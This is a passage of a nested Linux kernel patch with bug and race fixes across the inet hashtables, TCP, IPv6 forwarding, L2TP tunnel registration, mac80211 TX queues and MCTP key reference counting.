+ 		if (type > RTAX_MAX)
+ 			return false;
+ 
++		type = array_index_nospec(type, RTAX_MAX + 1);
+ 		if (type == RTAX_CC_ALGO) {
+ 			char tmp[TCP_CA_NAME_MAX];
+ 			bool ecn_ca = false;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 67f5e54408020..a5711b8f4cb19 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -650,8 +650,20 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	spin_lock(lock);
+ 	if (osk) {
+ 		WARN_ON_ONCE(sk->sk_hash != osk->sk_hash);
+-		ret = sk_nulls_del_node_init_rcu(osk);
+-	} else if (found_dup_sk) {
++		ret = sk_hashed(osk);
++		if (ret) {
++			/* Before deleting the node, we insert a new one to make
++			 * sure that the look-up-sk process would not miss either
++			 * of them and that at least one node would exist in ehash
++			 * table all the time. Otherwise there's a tiny chance
++			 * that lookup process could find nothing in ehash table.
++			 */
++			__sk_nulls_add_node_tail_rcu(sk, list);
++			sk_nulls_del_node_init_rcu(osk);
++		}
++		goto unlock;
++	}
++	if (found_dup_sk) {
+ 		*found_dup_sk = inet_ehash_lookup_by_sk(sk, list);
+ 		if (*found_dup_sk)
+ 			ret = false;
+@@ -660,6 +672,7 @@ bool inet_ehash_insert(struct sock *sk, struct sock *osk, bool *found_dup_sk)
+ 	if (ret)
+ 		__sk_nulls_add_node_rcu(sk, list);
+ 
++unlock:
+ 	spin_unlock(lock);
+ 
+ 	return ret;
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 1d77d992e6e77..beed32fff4841 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -91,10 +91,10 @@ void inet_twsk_put(struct inet_timewait_sock *tw)
+ }
+ EXPORT_SYMBOL_GPL(inet_twsk_put);
+ 
+-static void inet_twsk_add_node_rcu(struct inet_timewait_sock *tw,
+-				   struct hlist_nulls_head *list)
++static void inet_twsk_add_node_tail_rcu(struct inet_timewait_sock *tw,
++					struct hlist_nulls_head *list)
+ {
+-	hlist_nulls_add_head_rcu(&tw->tw_node, list);
++	hlist_nulls_add_tail_rcu(&tw->tw_node, list);
+ }
+ 
+ static void inet_twsk_add_bind_node(struct inet_timewait_sock *tw,
+@@ -147,7 +147,7 @@ void inet_twsk_hashdance(struct inet_timewait_sock *tw, struct sock *sk,
+ 
+ 	spin_lock(lock);
+ 
+-	inet_twsk_add_node_rcu(tw, &ehead->chain);
++	inet_twsk_add_node_tail_rcu(tw, &ehead->chain);
+ 
+ 	/* Step 3: Remove SK from hash chain */
+ 	if (__sk_nulls_del_node_init_rcu(sk))
+diff --git a/net/ipv4/metrics.c b/net/ipv4/metrics.c
+index 25ea6ac44db95..6a1427916c7dc 100644
+--- a/net/ipv4/metrics.c
++++ b/net/ipv4/metrics.c
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ #include <linux/netlink.h>
++#include <linux/nospec.h>
+ #include <linux/rtnetlink.h>
+ #include <linux/types.h>
+ #include <net/ip.h>
+@@ -28,6 +29,7 @@ static int ip_metrics_convert(struct net *net, struct nlattr *fc_mx,
+ 			return -EINVAL;
+ 		}
+ 
++		type = array_index_nospec(type, RTAX_MAX + 1);
+ 		if (type == RTAX_CC_ALGO) {
+ 			char tmp[TCP_CA_NAME_MAX];
+ 
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 4f2205756cfee..ec19ed7224536 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -435,6 +435,7 @@ void tcp_init_sock(struct sock *sk)
+ 
+ 	/* There's a bubble in the pipe until at least the first ACK. */
+ 	tp->app_limited = ~0U;
++	tp->rate_app_limited = 1;
+ 
+ 	/* See draft-stevens-tcpca-spec-01 for discussion of the
+ 	 * initialization of these values.
+@@ -3177,6 +3178,7 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	tp->last_oow_ack_time = 0;
+ 	/* There's a bubble in the pipe until at least the first ACK. */
+ 	tp->app_limited = ~0U;
++	tp->rate_app_limited = 1;
+ 	tp->rack.mstamp = 0;
+ 	tp->rack.advanced = 0;
+ 	tp->rack.reo_wnd_steps = 1;
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 60fd91bb5171c..c314fdde0097c 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -547,7 +547,20 @@ int ip6_forward(struct sk_buff *skb)
+ 	    pneigh_lookup(&nd_tbl, net, &hdr->daddr, skb->dev, 0)) {
+ 		int proxied = ip6_forward_proxy_check(skb);
+ 		if (proxied > 0) {
+-			hdr->hop_limit--;
++			/* It's tempting to decrease the hop limit
++			 * here by 1, as we do at the end of the
++			 * function too.
++			 *
++			 * But that would be incorrect, as proxying is
++			 * not forwarding.  The ip6_input function
++			 * will handle this packet locally, and it
++			 * depends on the hop limit being unchanged.
++			 *
++			 * One example is the NDP hop limit, that
++			 * always has to stay 255, but other would be
++			 * similar checks around RA packets, where the
++			 * user can even change the desired limit.
++			 */
+ 			return ip6_input(skb);
+ 		} else if (proxied < 0) {
+ 			__IP6_INC_STATS(net, idev, IPSTATS_MIB_INDISCARDS);
+diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
+index 9a1415fe3fa78..03608d3ded4b8 100644
+--- a/net/l2tp/l2tp_core.c
++++ b/net/l2tp/l2tp_core.c
+@@ -104,9 +104,9 @@ static struct workqueue_struct *l2tp_wq;
+ /* per-net private data for this module */
+ static unsigned int l2tp_net_id;
+ struct l2tp_net {
+-	struct list_head l2tp_tunnel_list;
+-	/* Lock for write access to l2tp_tunnel_list */
+-	spinlock_t l2tp_tunnel_list_lock;
++	/* Lock for write access to l2tp_tunnel_idr */
++	spinlock_t l2tp_tunnel_idr_lock;
++	struct idr l2tp_tunnel_idr;
+ 	struct hlist_head l2tp_session_hlist[L2TP_HASH_SIZE_2];
+ 	/* Lock for write access to l2tp_session_hlist */
+ 	spinlock_t l2tp_session_hlist_lock;
+@@ -208,13 +208,10 @@ struct l2tp_tunnel *l2tp_tunnel_get(const struct net *net, u32 tunnel_id)
+ 	struct l2tp_tunnel *tunnel;
+ 
+ 	rcu_read_lock_bh();
+-	list_for_each_entry_rcu(tunnel, &pn->l2tp_tunnel_list, list) {
+-		if (tunnel->tunnel_id == tunnel_id &&
+-		    refcount_inc_not_zero(&tunnel->ref_count)) {
+-			rcu_read_unlock_bh();
+-
+-			return tunnel;
+-		}
++	tunnel = idr_find(&pn->l2tp_tunnel_idr, tunnel_id);
++	if (tunnel && refcount_inc_not_zero(&tunnel->ref_count)) {
++		rcu_read_unlock_bh();
++		return tunnel;
+ 	}
+ 	rcu_read_unlock_bh();
+ 
+@@ -224,13 +221,14 @@ EXPORT_SYMBOL_GPL(l2tp_tunnel_get);
+ 
+ struct l2tp_tunnel *l2tp_tunnel_get_nth(const struct net *net, int nth)
+ {
+-	const struct l2tp_net *pn = l2tp_pernet(net);
++	struct l2tp_net *pn = l2tp_pernet(net);
++	unsigned long tunnel_id, tmp;
+ 	struct l2tp_tunnel *tunnel;
+ 	int count = 0;
+ 
+ 	rcu_read_lock_bh();
+-	list_for_each_entry_rcu(tunnel, &pn->l2tp_tunnel_list, list) {
+-		if (++count > nth &&
++	idr_for_each_entry_ul(&pn->l2tp_tunnel_idr, tunnel, tmp, tunnel_id) {
++		if (tunnel && ++count > nth &&
+ 		    refcount_inc_not_zero(&tunnel->ref_count)) {
+ 			rcu_read_unlock_bh();
+ 			return tunnel;
+@@ -1043,7 +1041,7 @@ static int l2tp_xmit_core(struct l2tp_session *session, struct sk_buff *skb, uns
+ 	IPCB(skb)->flags &= ~(IPSKB_XFRM_TUNNEL_SIZE | IPSKB_XFRM_TRANSFORMED | IPSKB_REROUTED);
+ 	nf_reset_ct(skb);
+ 
+-	bh_lock_sock(sk);
++	bh_lock_sock_nested(sk);
+ 	if (sock_owned_by_user(sk)) {
+ 		kfree_skb(skb);
+ 		ret = NET_XMIT_DROP;
+@@ -1227,6 +1225,15 @@ static void l2tp_udp_encap_destroy(struct sock *sk)
+ 		l2tp_tunnel_delete(tunnel);
+ }
+ 
++static void l2tp_tunnel_remove(struct net *net, struct l2tp_tunnel *tunnel)
++{
++	struct l2tp_net *pn = l2tp_pernet(net);
++
++	spin_lock_bh(&pn->l2tp_tunnel_idr_lock);
++	idr_remove(&pn->l2tp_tunnel_idr, tunnel->tunnel_id);
++	spin_unlock_bh(&pn->l2tp_tunnel_idr_lock);
++}
++
+ /* Workqueue tunnel deletion function */
+ static void l2tp_tunnel_del_work(struct work_struct *work)
+ {
+@@ -1234,7 +1241,6 @@ static void l2tp_tunnel_del_work(struct work_struct *work)
+ 						  del_work);
+ 	struct sock *sk = tunnel->sock;
+ 	struct socket *sock = sk->sk_socket;
+-	struct l2tp_net *pn;
+ 
+ 	l2tp_tunnel_closeall(tunnel);
+ 
+@@ -1248,12 +1254,7 @@ static void l2tp_tunnel_del_work(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	/* Remove the tunnel struct from the tunnel list */
+-	pn = l2tp_pernet(tunnel->l2tp_net);
+-	spin_lock_bh(&pn->l2tp_tunnel_list_lock);
+-	list_del_rcu(&tunnel->list);
+-	spin_unlock_bh(&pn->l2tp_tunnel_list_lock);
+-
++	l2tp_tunnel_remove(tunnel->l2tp_net, tunnel);
+ 	/* drop initial ref */
+ 	l2tp_tunnel_dec_refcount(tunnel);
+ 
+@@ -1384,8 +1385,6 @@ out:
+ 	return err;
+ }
+ 
+-static struct lock_class_key l2tp_socket_class;
+-
+ int l2tp_tunnel_create(int fd, int version, u32 tunnel_id, u32 peer_tunnel_id,
+ 		       struct l2tp_tunnel_cfg *cfg, struct l2tp_tunnel **tunnelp)
+ {
+@@ -1455,12 +1454,19 @@ static int l2tp_validate_socket(const struct sock *sk, const struct net *net,
+ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 			 struct l2tp_tunnel_cfg *cfg)
+ {
+-	struct l2tp_tunnel *tunnel_walk;
+-	struct l2tp_net *pn;
++	struct l2tp_net *pn = l2tp_pernet(net);
++	u32 tunnel_id = tunnel->tunnel_id;
+ 	struct socket *sock;
+ 	struct sock *sk;
+ 	int ret;
+ 
++	spin_lock_bh(&pn->l2tp_tunnel_idr_lock);
++	ret = idr_alloc_u32(&pn->l2tp_tunnel_idr, NULL, &tunnel_id, tunnel_id,
++			    GFP_ATOMIC);
++	spin_unlock_bh(&pn->l2tp_tunnel_idr_lock);
++	if (ret)
++		return ret == -ENOSPC ? -EEXIST : ret;
++
+ 	if (tunnel->fd < 0) {
+ 		ret = l2tp_tunnel_sock_create(net, tunnel->tunnel_id,
+ 					      tunnel->peer_tunnel_id, cfg,
+@@ -1474,6 +1480,7 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 	}
+ 
+ 	sk = sock->sk;
++	lock_sock(sk);
+ 	write_lock_bh(&sk->sk_callback_lock);
+ 	ret = l2tp_validate_socket(sk, net, tunnel->encap);
+ 	if (ret < 0)
+@@ -1481,24 +1488,6 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 	rcu_assign_sk_user_data(sk, tunnel);
+ 	write_unlock_bh(&sk->sk_callback_lock);
+ 
+-	tunnel->l2tp_net = net;
+-	pn = l2tp_pernet(net);
+-
+-	sock_hold(sk);
+-	tunnel->sock = sk;
+-
+-	spin_lock_bh(&pn->l2tp_tunnel_list_lock);
+-	list_for_each_entry(tunnel_walk, &pn->l2tp_tunnel_list, list) {
+-		if (tunnel_walk->tunnel_id == tunnel->tunnel_id) {
+-			spin_unlock_bh(&pn->l2tp_tunnel_list_lock);
+-			sock_put(sk);
+-			ret = -EEXIST;
+-			goto err_sock;
+-		}
+-	}
+-	list_add_rcu(&tunnel->list, &pn->l2tp_tunnel_list);
+-	spin_unlock_bh(&pn->l2tp_tunnel_list_lock);
+-
+ 	if (tunnel->encap == L2TP_ENCAPTYPE_UDP) {
+ 		struct udp_tunnel_sock_cfg udp_cfg = {
+ 			.sk_user_data = tunnel,
+@@ -1512,9 +1501,16 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 
+ 	tunnel->old_sk_destruct = sk->sk_destruct;
+ 	sk->sk_destruct = &l2tp_tunnel_destruct;
+-	lockdep_set_class_and_name(&sk->sk_lock.slock, &l2tp_socket_class,
+-				   "l2tp_sock");
+ 	sk->sk_allocation = GFP_ATOMIC;
++	release_sock(sk);
++
++	sock_hold(sk);
++	tunnel->sock = sk;
++	tunnel->l2tp_net = net;
++
++	spin_lock_bh(&pn->l2tp_tunnel_idr_lock);
++	idr_replace(&pn->l2tp_tunnel_idr, tunnel, tunnel->tunnel_id);
++	spin_unlock_bh(&pn->l2tp_tunnel_idr_lock);
+ 
+ 	trace_register_tunnel(tunnel);
+ 
+@@ -1523,17 +1519,16 @@ int l2tp_tunnel_register(struct l2tp_tunnel *tunnel, struct net *net,
+ 
+ 	return 0;
+ 
+-err_sock:
+-	write_lock_bh(&sk->sk_callback_lock);
+-	rcu_assign_sk_user_data(sk, NULL);
+ err_inval_sock:
+ 	write_unlock_bh(&sk->sk_callback_lock);
++	release_sock(sk);
+ 
+ 	if (tunnel->fd < 0)
+ 		sock_release(sock);
+ 	else
+ 		sockfd_put(sock);
+ err:
++	l2tp_tunnel_remove(net, tunnel);
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(l2tp_tunnel_register);
+@@ -1647,8 +1642,8 @@ static __net_init int l2tp_init_net(struct net *net)
+ 	struct l2tp_net *pn = net_generic(net, l2tp_net_id);
+ 	int hash;
+ 
+-	INIT_LIST_HEAD(&pn->l2tp_tunnel_list);
+-	spin_lock_init(&pn->l2tp_tunnel_list_lock);
++	idr_init(&pn->l2tp_tunnel_idr);
++	spin_lock_init(&pn->l2tp_tunnel_idr_lock);
+ 
+ 	for (hash = 0; hash < L2TP_HASH_SIZE_2; hash++)
+ 		INIT_HLIST_HEAD(&pn->l2tp_session_hlist[hash]);
+@@ -1662,11 +1657,13 @@ static __net_exit void l2tp_exit_net(struct net *net)
+ {
+ 	struct l2tp_net *pn = l2tp_pernet(net);
+ 	struct l2tp_tunnel *tunnel = NULL;
++	unsigned long tunnel_id, tmp;
+ 	int hash;
+ 
+ 	rcu_read_lock_bh();
+-	list_for_each_entry_rcu(tunnel, &pn->l2tp_tunnel_list, list) {
+-		l2tp_tunnel_delete(tunnel);
++	idr_for_each_entry_ul(&pn->l2tp_tunnel_idr, tunnel, tmp, tunnel_id) {
++		if (tunnel)
++			l2tp_tunnel_delete(tunnel);
+ 	}
+ 	rcu_read_unlock_bh();
+ 
+@@ -1676,6 +1673,7 @@ static __net_exit void l2tp_exit_net(struct net *net)
+ 
+ 	for (hash = 0; hash < L2TP_HASH_SIZE_2; hash++)
+ 		WARN_ON_ONCE(!hlist_empty(&pn->l2tp_session_hlist[hash]));
++	idr_destroy(&pn->l2tp_tunnel_idr);
+ }
+ 
+ static struct pernet_operations l2tp_net_ops = {
+diff --git a/net/mac80211/agg-tx.c b/net/mac80211/agg-tx.c
+index b2e40465289d6..85d2b9e4b51ce 100644
+--- a/net/mac80211/agg-tx.c
++++ b/net/mac80211/agg-tx.c
+@@ -511,8 +511,6 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 	 */
+ 	clear_bit(HT_AGG_STATE_WANT_START, &tid_tx->state);
+ 
+-	ieee80211_agg_stop_txq(sta, tid);
+-
+ 	/*
+ 	 * Make sure no packets are being processed. This ensures that
+ 	 * we have a valid starting sequence number and that in-flight
+diff --git a/net/mac80211/debugfs_sta.c b/net/mac80211/debugfs_sta.c
+index d3397c1248d36..b057253db28d5 100644
+--- a/net/mac80211/debugfs_sta.c
++++ b/net/mac80211/debugfs_sta.c
+@@ -167,7 +167,7 @@ static ssize_t sta_aqm_read(struct file *file, char __user *userbuf,
+ 			continue;
+ 		txqi = to_txq_info(sta->sta.txq[i]);
+ 		p += scnprintf(p, bufsz + buf - p,
+-			       "%d %d %u %u %u %u %u %u %u %u %u 0x%lx(%s%s%s)\n",
++			       "%d %d %u %u %u %u %u %u %u %u %u 0x%lx(%s%s%s%s)\n",
+ 			       txqi->txq.tid,
+ 			       txqi->txq.ac,
+ 			       txqi->tin.backlog_bytes,
+@@ -182,7 +182,8 @@ static ssize_t sta_aqm_read(struct file *file, char __user *userbuf,
+ 			       txqi->flags,
+ 			       test_bit(IEEE80211_TXQ_STOP, &txqi->flags) ? "STOP" : "RUN",
+ 			       test_bit(IEEE80211_TXQ_AMPDU, &txqi->flags) ? " AMPDU" : "",
+-			       test_bit(IEEE80211_TXQ_NO_AMSDU, &txqi->flags) ? " NO-AMSDU" : "");
++			       test_bit(IEEE80211_TXQ_NO_AMSDU, &txqi->flags) ? " NO-AMSDU" : "",
++			       test_bit(IEEE80211_TXQ_DIRTY, &txqi->flags) ? " DIRTY" : "");
+ 	}
+ 
+ 	rcu_read_unlock();
+diff --git a/net/mac80211/driver-ops.h b/net/mac80211/driver-ops.h
+index 81e40b0a3b167..e685c12757f4b 100644
+--- a/net/mac80211/driver-ops.h
++++ b/net/mac80211/driver-ops.h
+@@ -1183,7 +1183,7 @@ static inline void drv_wake_tx_queue(struct ieee80211_local *local,
+ 
+ 	/* In reconfig don't transmit now, but mark for waking later */
+ 	if (local->in_reconfig) {
+-		set_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txq->flags);
++		set_bit(IEEE80211_TXQ_DIRTY, &txq->flags);
+ 		return;
+ 	}
+ 
+diff --git a/net/mac80211/ht.c b/net/mac80211/ht.c
+index 83bc41346ae7f..ae42e956eff5a 100644
+--- a/net/mac80211/ht.c
++++ b/net/mac80211/ht.c
+@@ -391,6 +391,43 @@ void ieee80211_ba_session_work(struct work_struct *work)
+ 
+ 		tid_tx = sta->ampdu_mlme.tid_start_tx[tid];
+ 		if (!blocked && tid_tx) {
++			struct ieee80211_sub_if_data *sdata = sta->sdata;
++			struct ieee80211_local *local = sdata->local;
++
++			if (local->ops->wake_tx_queue) {
++				struct txq_info *txqi =
++					to_txq_info(sta->sta.txq[tid]);
++				struct fq *fq = &local->fq;
++
++				spin_lock_bh(&fq->lock);
++
++				/* Allow only frags to be dequeued */
++				set_bit(IEEE80211_TXQ_STOP, &txqi->flags);
++
++				if (!skb_queue_empty(&txqi->frags)) {
++					/* Fragmented Tx is ongoing, wait for it
++					 * to finish. Reschedule worker to retry
++					 * later.
++					 */
++
++					spin_unlock_bh(&fq->lock);
++					spin_unlock_bh(&sta->lock);
++
++					/* Give the task working on the txq a
++					 * chance to send out the queued frags
++					 */
++					synchronize_net();
++
++					mutex_unlock(&sta->ampdu_mlme.mtx);
++
++					ieee80211_queue_work(&sdata->local->hw,
++							     work);
++					return;
++				}
++
++				spin_unlock_bh(&fq->lock);
++			}
++
+ 			/*
+ 			 * Assign it over to the normal tid_tx array
+ 			 * where it "goes live".
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index de7b8a4d4bbbb..a8862f2c64ec0 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -836,7 +836,7 @@ enum txq_info_flags {
+ 	IEEE80211_TXQ_STOP,
+ 	IEEE80211_TXQ_AMPDU,
+ 	IEEE80211_TXQ_NO_AMSDU,
+-	IEEE80211_TXQ_STOP_NETIF_TX,
++	IEEE80211_TXQ_DIRTY,
+ };
+ 
+ /**
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index cc10ee1ff8e93..6409097a56c7a 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -1295,7 +1295,8 @@ ieee80211_tx_prepare(struct ieee80211_sub_if_data *sdata,
+ 	if (!(info->flags & IEEE80211_TX_CTL_DONTFRAG)) {
+ 		if (!(tx->flags & IEEE80211_TX_UNICAST) ||
+ 		    skb->len + FCS_LEN <= local->hw.wiphy->frag_threshold ||
+-		    info->flags & IEEE80211_TX_CTL_AMPDU)
++		    (info->flags & IEEE80211_TX_CTL_AMPDU &&
++		     !local->ops->wake_tx_queue))
+ 			info->flags |= IEEE80211_TX_CTL_DONTFRAG;
+ 	}
+ 
+@@ -3709,13 +3710,15 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 	struct ieee80211_local *local = hw_to_local(hw);
+ 	struct txq_info *txqi = container_of(txq, struct txq_info, txq);
+ 	struct ieee80211_hdr *hdr;
+-	struct sk_buff *skb = NULL;
+ 	struct fq *fq = &local->fq;
+ 	struct fq_tin *tin = &txqi->tin;
+ 	struct ieee80211_tx_info *info;
+ 	struct ieee80211_tx_data tx;
++	struct sk_buff *skb;
+ 	ieee80211_tx_result r;
+ 	struct ieee80211_vif *vif = txq->vif;
++	int q = vif->hw_queue[txq->ac];
++	bool q_stopped;
+ 
+ 	WARN_ON_ONCE(softirq_count() == 0);
+ 
+@@ -3723,17 +3726,18 @@ struct sk_buff *ieee80211_tx_dequeue(struct ieee80211_hw *hw,
+ 		return NULL;
+ 
+ begin:
+-	spin_lock_bh(&fq->lock);
++	spin_lock(&local->queue_stop_reason_lock);
++	q_stopped = local->queue_stop_reasons[q];
++	spin_unlock(&local->queue_stop_reason_lock);
+ 
+-	if (test_bit(IEEE80211_TXQ_STOP, &txqi->flags) ||
+-	    test_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txqi->flags))
+-		goto out;
+-
+-	if (vif->txqs_stopped[txq->ac]) {
+-		set_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txqi->flags);
+-		goto out;
++	if (unlikely(q_stopped)) {
++		/* mark for waking later */
++		set_bit(IEEE80211_TXQ_DIRTY, &txqi->flags);
++		return NULL;
+ 	}
+ 
++	spin_lock_bh(&fq->lock);
++
+ 	/* Make sure fragments stay together. */
+ 	skb = __skb_dequeue(&txqi->frags);
+ 	if (unlikely(skb)) {
+@@ -3743,6 +3747,9 @@ begin:
+ 		IEEE80211_SKB_CB(skb)->control.flags &=
+ 			~IEEE80211_TX_INTCFL_NEED_TXPROCESSING;
+ 	} else {
++		if (unlikely(test_bit(IEEE80211_TXQ_STOP, &txqi->flags)))
++			goto out;
++
+ 		skb = fq_tin_dequeue(fq, tin, fq_tin_dequeue_func);
+ 	}
+ 
+@@ -3793,7 +3800,8 @@ begin:
+ 	}
+ 
+ 	if (test_bit(IEEE80211_TXQ_AMPDU, &txqi->flags))
+-		info->flags |= IEEE80211_TX_CTL_AMPDU;
++		info->flags |= (IEEE80211_TX_CTL_AMPDU |
++				IEEE80211_TX_CTL_DONTFRAG);
+ 	else
+ 		info->flags &= ~IEEE80211_TX_CTL_AMPDU;
+ 
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index b512cb37aafb7..ed53c51bbc321 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -301,8 +301,6 @@ static void __ieee80211_wake_txqs(struct ieee80211_sub_if_data *sdata, int ac)
+ 	local_bh_disable();
+ 	spin_lock(&fq->lock);
+ 
+-	sdata->vif.txqs_stopped[ac] = false;
+-
+ 	if (!test_bit(SDATA_STATE_RUNNING, &sdata->state))
+ 		goto out;
+ 
+@@ -324,7 +322,7 @@ static void __ieee80211_wake_txqs(struct ieee80211_sub_if_data *sdata, int ac)
+ 			if (ac != txq->ac)
+ 				continue;
+ 
+-			if (!test_and_clear_bit(IEEE80211_TXQ_STOP_NETIF_TX,
++			if (!test_and_clear_bit(IEEE80211_TXQ_DIRTY,
+ 						&txqi->flags))
+ 				continue;
+ 
+@@ -339,7 +337,7 @@ static void __ieee80211_wake_txqs(struct ieee80211_sub_if_data *sdata, int ac)
+ 
+ 	txqi = to_txq_info(vif->txq);
+ 
+-	if (!test_and_clear_bit(IEEE80211_TXQ_STOP_NETIF_TX, &txqi->flags) ||
++	if (!test_and_clear_bit(IEEE80211_TXQ_DIRTY, &txqi->flags) ||
+ 	    (ps && atomic_read(&ps->num_sta_ps)) || ac != vif->txq->ac)
+ 		goto out;
+ 
+@@ -537,16 +535,10 @@ static void __ieee80211_stop_queue(struct ieee80211_hw *hw, int queue,
+ 			continue;
+ 
+ 		for (ac = 0; ac < n_acs; ac++) {
+-			if (sdata->vif.hw_queue[ac] == queue ||
+-			    sdata->vif.cab_queue == queue) {
+-				if (!local->ops->wake_tx_queue) {
+-					netif_stop_subqueue(sdata->dev, ac);
+-					continue;
+-				}
+-				spin_lock(&local->fq.lock);
+-				sdata->vif.txqs_stopped[ac] = true;
+-				spin_unlock(&local->fq.lock);
+-			}
++			if (!local->ops->wake_tx_queue &&
++			    (sdata->vif.hw_queue[ac] == queue ||
++			     sdata->vif.cab_queue == queue))
++				netif_stop_subqueue(sdata->dev, ac);
+ 		}
+ 	}
+ 	rcu_read_unlock();
+diff --git a/net/mctp/af_mctp.c b/net/mctp/af_mctp.c
+index fc9e728b6333a..45bbe3e54cc28 100644
+--- a/net/mctp/af_mctp.c
++++ b/net/mctp/af_mctp.c
+@@ -544,9 +544,6 @@ static int mctp_sk_init(struct sock *sk)
+ 
+ static void mctp_sk_close(struct sock *sk, long timeout)
+ {
+-	struct mctp_sock *msk = container_of(sk, struct mctp_sock, sk);
+-
+-	del_timer_sync(&msk->key_expiry);
+ 	sk_common_release(sk);
+ }
+ 
+@@ -580,7 +577,14 @@ static void mctp_sk_unhash(struct sock *sk)
+ 		spin_lock_irqsave(&key->lock, fl2);
+ 		__mctp_key_remove(key, net, fl2, MCTP_TRACE_KEY_CLOSED);
+ 	}
++	sock_set_flag(sk, SOCK_DEAD);
+ 	spin_unlock_irqrestore(&net->mctp.keys_lock, flags);
++
++	/* Since there are no more tag allocations (we have removed all of the
++	 * keys), stop any pending expiry events. the timer cannot be re-queued
++	 * as the sk is no longer observable
++	 */
++	del_timer_sync(&msk->key_expiry);
+ }
+ 
+ static struct proto mctp_proto = {
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index f9a80b82dc511..f51a05ec71624 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -147,6 +147,7 @@ static struct mctp_sk_key *mctp_key_alloc(struct mctp_sock *msk,
+ 	key->valid = true;
+ 	spin_lock_init(&key->lock);
+ 	refcount_set(&key->refs, 1);
++	sock_hold(key->sk);
+ 
+ 	return key;
+ }
+@@ -165,6 +166,7 @@ void mctp_key_unref(struct mctp_sk_key *key)
+ 	mctp_dev_release_key(key->dev, key);
+ 	spin_unlock_irqrestore(&key->lock, flags);
+ 
++	sock_put(key->sk);
+ 	kfree(key);
+ }
+ 
+@@ -177,6 +179,11 @@ static int mctp_key_add(struct mctp_sk_key *key, struct mctp_sock *msk)
+ 
+ 	spin_lock_irqsave(&net->mctp.keys_lock, flags);
+ 
++	if (sock_flag(&msk->sk, SOCK_DEAD)) {
++		rc = -EINVAL;
++		goto out_unlock;
++	}
++
+ 	hlist_for_each_entry(tmp, &net->mctp.keys, hlist) {
+ 		if (mctp_key_match(tmp, key->local_addr, key->peer_addr,
+ 				   key->tag)) {
+@@ -198,6 +205,7 @@ static int mctp_key_add(struct mctp_sk_key *key, struct mctp_sock *msk)
+ 		hlist_add_head(&key->sklist, &msk->keys);
+ 	}
+ 
++out_unlock:
+ 	spin_unlock_irqrestore(&net->mctp.keys_lock, flags);
+ 
+ 	return rc;
+@@ -315,8 +323,8 @@ static int mctp_frag_queue(struct mctp_sk_key *key, struct sk_buff *skb)
+ 
+ static int mctp_route_input(struct mctp_route *route, struct sk_buff *skb)
+ {
++	struct mctp_sk_key *key, *any_key = NULL;
+ 	struct net *net = dev_net(skb->dev);
+-	struct mctp_sk_key *key;
+ 	struct mctp_sock *msk;
+ 	struct mctp_hdr *mh;
+ 	unsigned long f;
+@@ -361,13 +369,11 @@ static int mctp_route_input(struct mctp_route *route, struct sk_buff *skb)
+ 			 * key for reassembly - we'll create a more specific
+ 			 * one for future packets if required (ie, !EOM).
+ 			 */
+-			key = mctp_lookup_key(net, skb, MCTP_ADDR_ANY, &f);
+-			if (key) {
+-				msk = container_of(key->sk,
++			any_key = mctp_lookup_key(net, skb, MCTP_ADDR_ANY, &f);
++			if (any_key) {
++				msk = container_of(any_key->sk,
+ 						   struct mctp_sock, sk);
+-				spin_unlock_irqrestore(&key->lock, f);
+-				mctp_key_unref(key);
+-				key = NULL;
++				spin_unlock_irqrestore(&any_key->lock, f);
+ 			}
+ 		}
+ 
+@@ -419,14 +425,14 @@ static int mctp_route_input(struct mctp_route *route, struct sk_buff *skb)
+ 			 * this function.
+ 			 */
+ 			rc = mctp_key_add(key, msk);
+-			if (rc) {
+-				kfree(key);
+-			} else {
++			if (!rc)
+ 				trace_mctp_key_acquire(key);
+ 
+-				/* we don't need to release key->lock on exit */
+-				mctp_key_unref(key);
+-			}
++			/* we don't need to release key->lock on exit, so
++			 * clean up here and suppress the unlock via
++			 * setting to NULL
++			 */
++			mctp_key_unref(key);
+ 			key = NULL;
+ 
+ 		} else {
+@@ -473,6 +479,8 @@ out_unlock:
+ 		spin_unlock_irqrestore(&key->lock, f);
+ 		mctp_key_unref(key);
+ 	}
++	if (any_key)
++		mctp_key_unref(any_key);
+ out:
+ 	if (rc)
+ 		kfree_skb(skb);
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index 5a936334b517a..895e0ca542994 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
